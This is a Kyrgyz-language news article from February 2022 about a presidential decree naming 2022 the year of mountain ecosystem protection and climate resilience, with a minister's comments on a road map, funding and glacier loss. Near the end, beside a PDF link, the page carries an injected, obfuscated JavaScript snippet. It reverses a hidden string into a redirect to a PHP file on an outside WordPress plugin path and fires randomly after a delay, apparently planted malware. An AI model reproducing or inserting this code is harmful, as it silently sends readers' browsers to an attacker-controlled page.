Ар бир жаран өз салымын кошсо…

22-февраль, 2022-ж. / Редакция / Жаңылыктар 92

Үстүбүздөгү жыл Тоолордун экосистемасын коргоо жана климаттык туруктуулук жылы деп жарыяланды. Бул тууралуу Президент Садыр Жапаров Жарлыкка кол койду. Жарлыктын максаты – климаттын туруктуулугун жогорулатуу, жаратылыш мурастарын сактоо жана тоолорду туруктуу өнүктүрүүнүн эл аралык жылын белгилөө. Өткөн жылдын 16-декабрында БУУнун Башкы Ассамблеясынын 76-сессиясынын катышуучулары Кыргыз Республикасынын 2022-жылды «Тоолорду туруктуу өнүктүрүүнүн эл аралык жылы» деп жарыялоо демилгесин колдошкон.

Жаратылыш ресурстары, экология жана техникалык көзөмөл министри Динара Кутманова учурда БУУнун Башкы Ассамблеясында жана Глазгодо өткөн Климат боюнча лидерлеринин саммитинде Мамлекет башчысы Садыр Жапаров тарабынан белгиленген Кыргыз Республикасынын демилгелерин илгерилетүү боюнча маселелер иштелип жаткандыгын  билдирди.

Министрлер Кабинетине 1-мартка чейин “Тоолордун экосистемасын коргоо жана климаттык туруктуулук жылын” өткөрүү боюнча жол картасын иштеп чыгуу жана бекитүү тапшырылган. Анын алкагында айыл чарба, энергетика, өнөр жай тармактарында экологиялык жана климаттык иш-чараларды жана долбоорлорду ишке ашыруу маселелери каралат. Ошондой эле токой чарбасын, экотуризмди өнүктүрүү, өзгөчө кырдаалдардын кесепеттерин жоюу максатында эл аралык деңгээлдеги иш-чаралар өткөрүлөт.

Былтыркы жылы Кыргызстандын климатында чоң өзгөрүүлөр болгондугун айткан Динара Кутманова: “Бул олуттуу маселеден улам Президент Садыр Жапаровдун Жарлыгы чыкты. Экологиялык көйгөйлөрдү чечүүдө, тоолорубузду, мөңгүлөрүбүздү сактап  калуу үчүн бул документ керек болчу. Аны ишке ашырууга мамлекеттик мекемелер, жергиликтүү органдар жана ар бир жаран өз салымын кошуусу зарыл. Бул жарлыктын негизинде чогуу-чаран, биргеликте иш жүргүзөбүз. Бир айдын ичинде жол картасын түзүшүбүз керек. Анда ар бир мамлекеттик мекемелерге иш-чараларды өткөрүү милдети коюлат. Албетте, бардык нерсе каржы маселесине барып такалат. Биздин министрлик жоопкерчиликтүү орган катары каражат табуу үчүн эл аралык уюмдарга кайрылабыз. Былтыр Глазгого барганыбызда өз пландарыбызды айтканбыз. Парник газдарын азайтуу үчүн 7 млрд сом жардам жетишпейт. Биздин министрлик долбоорлорду жазып, тиешелүү жактарга кайрылабыз” ,- деди.

Динара Кутманова белгилегендей, Кыргызстан 2019-жылы БУУнун Климаттын өзгөрүшү боюнча алкактык конвенциясын ишке ашыруунун алкагында Париж макулдашуусун ратификациялаган. 2021-жылы парник газдарынын эмиссиясын кыскартуу боюнча милдеттенме алган. Ага ылайык, 2030-жылга карата эмиссияны 15,97%га жана эл аралык колдоо менен 43,62%га кыскартуу зарыл.

Негизинен мөңгү маселеси өлкөбүз үчүн эң актуалдуу көйгөйлөрдүн бири. 1976-жылы мөңгүлөрдүн жалпы аянты 8076 чарчы чакырым болсо, соңку 50 жылда мөңгүлөрдүн аянты 6683 чарчы чакырымга кыскарып кеткен. Алдыдагы 50 жылда майда мөңгүлөр эрип жоголуп, чөлкөмдө кургакчылык болот деген коркунуч турат. Адистер маселени мындай ахыбалга жеткирбеш үчүн тоолордун экосистемасын коргоо боюнча аракеттер эгемендик алгандан тартып эле башталышы зарыл эле дешет. Кеч болсо да иш-аракеттердин туура багытта жүрүшү көп нерсени алдын алат эмеспи.

Президенттик Администрациянын реформаларга анализ жана мониторинг жүргүзүү бөлүмүнүн башчысы Азамат Темиркулов Кыргызстандын мөңгүлөрү биз үчүн гана эмес, бүтүндөй Борбор Азияга маанилүү болуп тургандыгын белгиледи. Ошондуктан мөңгүлөрүбүздү сактоо үчүн ушул жылы чоң иш-чаралар пландаштырылып жаткандыгын кошумчалады.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/22_02.pdf»>2022-жылдын 22-февралы

Жылдыз Дыйканова

22-февраль, 2022-ж. / Редакция / Жаңылыктар 92
Бөлүшүү: Telegram WhatsApp X